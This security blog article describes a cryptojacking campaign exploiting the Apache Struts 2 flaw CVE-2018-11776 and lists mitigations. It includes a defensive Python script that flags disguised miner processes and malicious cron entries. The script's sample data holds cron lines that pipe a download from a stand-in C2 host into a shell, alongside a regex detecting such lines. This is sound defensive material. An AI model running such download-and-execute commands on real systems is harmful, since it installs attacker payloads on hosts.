That Didn't Take Long: Apache Struts 2 Vulnerability Widely Exploited in Cryptojacking Campaign
A little over a year after a vulnerability in Apache Struts (CVE-2017-5638) led Equifax to lose the personal data of almost 150 million Americans, another critical Remote Code Execution (RCE) vulnerability was found in Apache Struts last month. This vulnerability, dubbed Apache Struts 2 (CVE-2018-11776) or just "Struts 2", allows a remote attacker to execute arbitrary code on an application that was compiled with a vulnerable version of Apache Struts. Just two weeks after the vulnerability was disclosed, security researchers discovered a widespread cryptojacking campaign leveraging it. While cryptojacking has surged in popularity throughout 2018, what makes this campaign particularly interesting is that the attackers acknowledge that they may be neither the first nor the last cryptojacking campaign to hit a vulnerable server, and wrote code specifically to remove other malware from the machine.
Like a script out of HBO’s The Wire (language warning on the link) or Netflix’s Narcos, where rival drug gangs fight each other for territory, product, and influence, the cyber world is no different from real-life drug wars. Forget about the authorities: many organized criminal groups face their biggest threat from rival gangs, cartels, or syndicates. The latest cryptojacking campaign targeting servers vulnerable to Struts 2 is very careful to ensure that no other cryptojacking campaign steals its ill-gotten gains.
The attack campaign starts by sending a specially crafted URL that leverages the Struts 2 vulnerability to execute arbitrary code, giving the attacker shell access to the machine. Once the attacker has shell access, a script is downloaded to prepare the server for mining the Monero cryptocurrency. Monero is especially popular in cryptojacking campaigns because, unlike Bitcoin and Ethereum, it is friendly to CPU mining and hostile to GPU and ASIC (Application-Specific Integrated Circuit) mining. Attackers are far more likely to find spare CPU cycles on vulnerable machines than high-end GPUs and ASICs. Monero is also designed with stronger anonymity for its users, which makes it easier for criminals to remain unidentified. After the server is prepared, several cron jobs are set up to download second-stage attack payloads, phone home to a hard-coded command and control (C2) server, and remove any rival processes running on the machine.
Second-stage payloads allow the cryptocurrency miner to be modular, but they are mainly used to download and run the Monero miner. If the original payload is ever blocked or compromised, the C2 server can instruct the machine to download an updated version. The C2 server is set up to communicate only with clients presenting Linux user-agent strings, in an attempt to keep security researchers from discovering its true nature. At the time of writing, the campaign used a hard-coded mining pool that is currently offline; it is likely that a C2 update will switch to a different pool in an attempt to circumvent any blocks. Lastly, the cron job that deletes rival processes ensures that all available CPU cycles are dedicated to the attacker’s own cryptojacking campaign. This job looks for binaries commonly used by rival cryptojacking campaigns and deletes them, searches for processes consuming more than 60 percent of CPU and terminates them, and then renames its own cryptojacking process to something that looks benign, such as sshd or apache. A systems administrator who sees an apache process consuming a high percentage of CPU may well consider that normal.
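The two behaviours described above, a miner hiding under a benign process name and cron entries that pull down further payloads, are both visible from the host. The following is an added defender-side example, not code from the article or the campaign: it flags processes named sshd/apache that do not run from their usual binary path (the expected paths are assumed typical Linux locations), reuses the campaign's own 60 percent CPU cutoff as a hunting threshold, and picks out crontab lines that pipe a download straight into a shell. The sample process and cron data are constructed.

```python
import re

# Process names the campaign reuses for its miner, mapped to the binary paths a
# legitimate instance normally runs from (assumed Debian/RHEL defaults; adjust).
EXPECTED_EXE = {
    "sshd": {"/usr/sbin/sshd"},
    "apache": {"/usr/sbin/apache2", "/usr/sbin/httpd"},
    "apache2": {"/usr/sbin/apache2"},
    "httpd": {"/usr/sbin/httpd"},
}
CPU_THRESHOLD = 60.0  # same cutoff the rival-killer cron job uses


def check_processes(procs):
    """procs: dicts with pid, comm (/proc/<pid>/comm), exe (readlink of
    /proc/<pid>/exe) and cpu (percent, e.g. from `ps -o pid,comm,%cpu`).
    Returns a list of (pid, reason) findings."""
    findings = []
    for p in procs:
        expected = EXPECTED_EXE.get(p["comm"])
        if expected is not None and p["exe"] not in expected:
            findings.append((p["pid"], f"'{p['comm']}' running from unexpected path {p['exe']}"))
        elif p["cpu"] >= CPU_THRESHOLD:
            findings.append((p["pid"], f"'{p['comm']}' using {p['cpu']:.0f}% CPU"))
    return findings


# Cron entries that fetch a remote script and pipe it into a shell are how the
# campaign stages second-stage payloads and beacons to its C2 server.
DOWNLOAD_PIPE = re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba)?sh\b")


def check_cron(lines):
    """lines: crontab lines (crontab -l, /etc/cron.d/*). Returns those that
    pipe a download into a shell; commented-out lines are ignored."""
    return [ln for ln in lines if not ln.lstrip().startswith("#") and DOWNLOAD_PIPE.search(ln)]


# Constructed sample data, not taken from a real host.
SAMPLE_PROCS = [
    {"pid": 812, "comm": "sshd", "exe": "/usr/sbin/sshd", "cpu": 0.1},
    {"pid": 1301, "comm": "apache2", "exe": "/usr/sbin/apache2", "cpu": 3.5},
    {"pid": 4417, "comm": "apache", "exe": "/tmp/.x/apache", "cpu": 97.0},
    {"pid": 4520, "comm": "python3", "exe": "/usr/bin/python3", "cpu": 75.0},
]
SAMPLE_CRON = [
    "0 * * * * root /usr/local/bin/backup.sh",
    "*/10 * * * * root curl -fsSL http://c2.example.invalid/update.sh | sh",
    "# */5 * * * * root wget -qO- http://c2.example.invalid/a.sh | bash",
]
```

On a live host, populate the process dicts from /proc and feed `check_cron` the output of `crontab -l` for each user plus the files under /etc/cron.d; a high-CPU hit that also fails the path check is the strongest signal.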
Malware that removes previously installed malware and closes the vulnerabilities it used to exploit the machine is not a new development. For example, the Hajime IoT botnet infected vulnerable devices, closed backdoors and vulnerable ports, and disabled remote access so that no other botnet could infect the device. Brian Krebs' security blog has a nice breakdown of the value of a compromised PC, which is good evidence that a single attacker would not want to leave any money on the table, especially since cryptojacking operations are a zero-sum game: if one malware strain consumes 100% of CPU resources, another strain on the same machine necessarily gets 0%.
The simplest way to avoid being vulnerable to Struts 2 is to update Struts to a supported version and recompile the web application. While this is likely not feasible for 100% of affected applications, for example where an organization paid a one-time fee for someone to develop an application and cannot afford to have it updated, there are mitigations that can help limit exposure. A web application firewall can help prevent the exploit from reaching the vulnerable web application. An outbound web proxy service can block access to the C2 servers based on threat intelligence or heuristic behavior, block access to cryptomining pools, and block known cryptomining behavior. As criminals get more sophisticated, so must security researchers. It also does not take an enterprise-level security budget to get basic protections, such as those offered freely by The Cyber Threat Alliance’s Quad9 DNS service.